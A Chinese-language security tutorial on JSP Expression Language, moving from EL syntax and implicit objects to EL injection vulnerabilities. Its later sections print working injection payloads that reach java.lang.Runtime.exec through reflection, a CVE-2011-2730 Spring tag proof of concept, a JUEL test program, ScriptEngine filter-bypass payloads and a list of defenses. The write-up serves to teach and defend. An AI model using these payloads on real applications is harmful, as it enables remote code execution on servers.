浅析EL表达式注入漏洞

0x01 EL简介

EL（Expression Language） 是为了使JSP写起来更加简单。表达式语言的灵感来自于 ECMAScript 和 XPath 表达式语言，它提供了在 JSP 中简化表达式的方法，让Jsp的代码更加简化。

EL表达式主要功能如下：

${user==null}

0x02 基本语法

EL语法

在JSP中访问模型对象是通过EL表达式的语法来表达。所有EL表达式的格式都是以 ${} 表示。例如， ${ userinfo} 代表获取变量userinfo的值。当EL表达式中的变量不给定范围时，则默认在page范围查找，然后依次在request、session、application范围查找。也可以用范围作为前缀表示属于哪个范围的变量，例如： ${ pageScope. userinfo} 表示访问page范围中的userinfo变量。

简单地说，使用EL表达式语法： ${EL表达式}

其中， EL表达式和JSP代码等价转换 。事实上，可以将EL表达式理解为一种简化的JSP代码。

扩展JSP代码的写法总结：

• JSP表达式： <%=变量或表达式>

  向浏览器输出变量或表达式的计算结果。

• JSP脚本： <%Java代码%>

  执行java代码的原理：翻译到_jspService()方法中。

• JSP声明： <%!变量或方法%>

  声明jsp的成员变量或成员方法。

• JSP注释： <%!--JSP注释--%>

  用于注释JSP代码，不会翻译到Java文件中，也不会执行。

[ ]与.运算符

EL表达式提供 . 和 [] 两种运算符来存取数据。

当要存取的属性名称中包含一些特殊字符，如 . 或 - 等并非字母或数字的符号，就一定要使用 [] 。例如： ${user.My-Name} 应当改为 ${user["My-Name"]} 。

如果要动态取值时，就可以用 [] 来做，而 . 无法做到动态取值。例如： ${sessionScope.user[data]} 中data 是一个变量。

变量

EL表达式存取变量数据的方法很简单，例如： ${username} 。它的意思是取出某一范围中名称为username的变量。因为我们并没有指定哪一个范围的username，所以它会依序从Page、Request、Session、Application范围查找。假如途中找到username，就直接回传，不再继续找下去，但是假如全部的范围都没有找到时，就回传""。EL表达式的属性如下：

JSP表达式语言定义可在表达式中使用的以下文字：

操作符

JSP表达式语言提供以下操作符，其中大部分是Java中常用的操作符：

隐式对象

JSP表达式语言定义了一组隐式对象，其中许多对象在 JSP scriplet 和表达式中可用：

此外，还提供几个隐式对象，允许对以下对象进行简易访问：

除了上述两种类型的隐式对象之外，还有些对象允许访问多种范围的变量，如 Web 上下文、会话、请求、页面：

pageContext对象

pageContext对象是JSP中pageContext对象的引用。通过pageContext对象，您可以访问request对象。比如，访问request对象传入的查询字符串，就像这样：

${pageContext.request.queryString}

Scope对象

pageScope，requestScope，sessionScope，applicationScope变量用来访问存储在各个作用域层次的变量。

举例来说，如果您需要显式访问在applicationScope层的box变量，可以这样来访问：applicationScope.box。

<% 
    pageContext.setAttribute("name","mi1k7ea_page");  
    request.setAttribute("name","mi1k7ea_request");
    session.setAttribute("user","mi1k7ea_session");
    application.setAttribute("user","mi1k7ea_application");
%>

pageScope.name:${pageScope.name}
</br>
requestScope.name : ${requestScope.name}
</br>
sessionScope.user : ${sessionScope.user}
</br>
applicationScope.user : ${applicationScope.user}

param和paramValues对象

param和paramValues对象用来访问参数值，通过使用request.getParameter方法和request.getParameterValues方法。

举例来说，访问一个名为order的参数，可以这样使用表达式：${param.order}，或者${param["order"]}。

接下来的例子表明了如何访问request中的username参数：

<%@ page import="java.io.*,java.util.*" %>
<%
    String title = "Accessing Request Param";
%>
<html>
<head>
<title><% out.print(title); %></title>
</head>
<body>
<center>
<h1><% out.print(title); %></h1>
</center>
<div align="center">
<p>${param["username"]}</p>
</div>
</body>
</html>

param对象返回单一的字符串，而paramValues对象则返回一个字符串数组。

header和headerValues对象

header和headerValues对象用来访问信息头，通过使用request.getHeader()方法和request.getHeaders()方法。

举例来说，要访问一个名为user-agent的信息头，可以这样使用表达式： ${header.user-agent} ，或者 ${header["user-agent"]} 。

接下来的例子表明了如何访问user-agent信息头：

<%@ page import="java.io.*,java.util.*" %>
<%
    String title = "User Agent Example";
%>
<html>
<head>
<title><% out.print(title); %></title>
</head>
<body>
<center>
<h1><% out.print(title); %></h1>
</center>
<div align="center">
<p>${header["user-agent"]}</p>
</div>
</body>
</html>

运行结果如下：

header对象返回单一值，而headerValues则返回一个字符串数组。

EL中的函数

EL允许您在表达式中使用函数。这些函数必须被定义在自定义标签库中。函数的使用语法如下：

${ns:func(param1, param2, ...)}

ns指的是命名空间（namespace），func指的是函数的名称，param1指的是第一个参数，param2指的是第二个参数，以此类推。比如，有函数fn:length，在JSTL库中定义，可以像下面这样来获取一个字符串的长度：

${fn:length("Get my length")}

要使用任何标签库中的函数，您需要将这些库安装在服务器中，然后使用 <taglib> 标签在JSP文件中包含这些库。

EL表达式调用Java方法

看个例子即可。

先新建一个ELFunc类，其中定义的doSomething()函数用于给输入的参数字符拼接".com"形成域名返回：

package eltest;

public class ELFunc {
    public static String doSomething(String str){
        return str + ".com";
    }
}

接着在WEB-INF文件夹下（除lib和classess目录外）新建test.tld文件，其中指定执行的Java方法及其URI地址：

<?xml version="1.0" encoding="UTF-8"?>
<taglib version="2.0" xmlns="http://java.sun.com/xml/ns/j2ee"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-jsptaglibrary_2_0.xsd">
    <tlib-version>1.0</tlib-version>
    <short-name>ELFunc</short-name>
    <uri>http://www.mi1k7ea.com/ELFunc</uri>
    <function>
        <name>doSomething</name>
        <function-class>eltest.ELFunc</function-class>
        <function-signature> java.lang.String doSomething(java.lang.String)</function-signature>
    </function>
</taglib>

JSP文件中，先头部导入taglib标签库，URI为test.tld中设置的URI地址，prefix为test.tld中设置的short-name，然后直接在EL表达式中使用 类名:方法名() 的形式来调用该类方法即可：

<%@taglib uri="http://www.mi1k7ea.com/ELFunc" prefix="ELFunc"%>
${ELFunc:doSomething("mi1k7ea")}

0x03 JSP中启动/禁用EL表达式

全局禁用EL表达式

web.xml中进入如下配置：

<jsp-config>
    <jsp-property-group>
        <url-pattern>*.jsp</url-pattern>
        <el-ignored>true</el-ignored>
    </jsp-property-group>
</jsp-config>

单个文件禁用EL表达式

在JSP文件中可以有如下定义：

<%@ page isELIgnored="true" %>

该语句表示是否禁用EL表达式，TRUE表示禁止，FALSE表示不禁止。

JSP2.0中默认的启用EL表达式。

例如如下的JSP代码禁用EL表达式：

<%@ page isELIgnored="true" %>
${pageContext.request.queryString}

0x04 EL表达式注入漏洞

EL表达式注入漏洞和SpEL、OGNL等表达式注入漏洞是一样的漏洞原理的，即表达式外部可控导致攻击者注入恶意表达式实现任意代码执行。

一般的，EL表达式注入漏洞的外部可控点入口都是在Java程序代码中，即Java程序中的EL表达式内容全部或部分是从外部获取的。

通用PoC

//对应于JSP页面中的pageContext对象（注意：取的是pageContext对象）
${pageContext}

//获取Web路径
${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

//文件头参数
${header}

//获取webRoot
${applicationScope}

//执行命令
${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc").getInputStream())}

比如我们在Java程序中可以控制输入EL表达式如下：

${pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"calc.exe"))}

如果该EL表达式直接在JSP页面中执行，则触发任意代码执行漏洞：

但是在实际场景中，是几乎没有也无法直接从外部控制JSP页面中的EL表达式的。而目前已知的EL表达式注入漏洞都是框架层面服务端执行的EL表达式外部可控导致的。

CVE-2011-2730

命令执行PoC如下：

<spring:message text=
"${/"/".getClass().forName(/"java.lang.Runtime/").getMethod(/"getRuntime/",null).invoke(null,null).exec(/"calc/",null).toString()}">
</spring:message>

再比如：

<%@ taglib uri="http://www.springframework.org/tags" prefix="spring"%>
<spring:message  text="${param.a}"></spring:message>

访问 http://localhost/XXX.jsp?a=$](https://links.jianshu.com/go?to=http%3A%2F%2Flocalhost%2FXXX.jsp%3Fa%3D%24){applicationScope} 。

容器第一次执行EL表达式 ${param.a} 获得了我们输入的 ${applicationScope} ，然后Spring标签获取容器的EL表达式求值对象，把 ${applicationScope} 再次执行掉，形成了漏洞。

Wooyun案例

参考Wooyun镜像上的案例：

搜狗某系统存在远程EL表达式注入漏洞(命令执行)

工商银行某系统存在远程EL表达式注入漏洞(命令执行)

JUEL示例

下面我们直接看下在Java代码中EL表达式注入的场景是怎么样的。

EL曾经是JSTL的一部分。然后，EL进入了JSP 2.0标准。现在，尽管是JSP 2.1的一部分，但EL API已被分离到包javax.el中， 并且已删除了对核心JSP类的所有依赖关系。换句话说：EL已准备好在非JSP应用程序中使用！

也就是说，现在EL表达式所依赖的包javax.el等都在JUEL相关的jar包中。

JUEL（Java Unified Expression Language）是统一表达语言轻量而高效级的实现，具有高性能，插件式缓存，小体积，支持方法调用和多参数调用，可插拔多种特性。

更多参考官网： http://juel.sourceforge.net/

需要的jar包：juel-api-2.2.7、juel-spi-2.2.7、juel-impl-2.2.7。

Test.java，利用反射调用Runtime类方法实现命令执行：

import de.odysseus.el.ExpressionFactoryImpl;
import de.odysseus.el.util.SimpleContext;

import javax.el.ExpressionFactory;
import javax.el.ValueExpression;

public class Test {
    public static void main(String[] args) {
        ExpressionFactory expressionFactory = new ExpressionFactoryImpl();
        SimpleContext simpleContext = new SimpleContext();
        // failed
        // String exp = "${''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')}";
        // ok
        String exp = "${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'calc.exe')}";
        ValueExpression valueExpression = expressionFactory.createValueExpression(simpleContext, exp, String.class);
        System.out.println(valueExpression.getValue(simpleContext));
    }
}

运行即触发：

0x05 绕过方法

这里针对前面在Java代码中注入EL表达式的例子来演示。其实绕过方法和SpEL表达式注入是一样的。

利用反射机制绕过

即前面Demo的PoC，注意一点的就是这里不支持用字符串拼接的方式绕过关键字过滤。

利用ScriptEngine调用JS引擎绕过

同SpEL注入中讲到的：

${''.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('calc')")}

0x06 防御方法

• 尽量不使用外部输入的内容作为EL表达式内容；

• 若使用，则严格过滤EL表达式注入漏洞的payload关键字；

• 如果是排查Java程序中JUEL相关代码，则搜索如下关键类方法：

  javax.el.ExpressionFactory.createValueExpression()
  javax.el.ValueExpression.getValue()

0x07 参考

JSP 表达式语言

EL表达式调用java方法

JAVA WEB EL表达式注入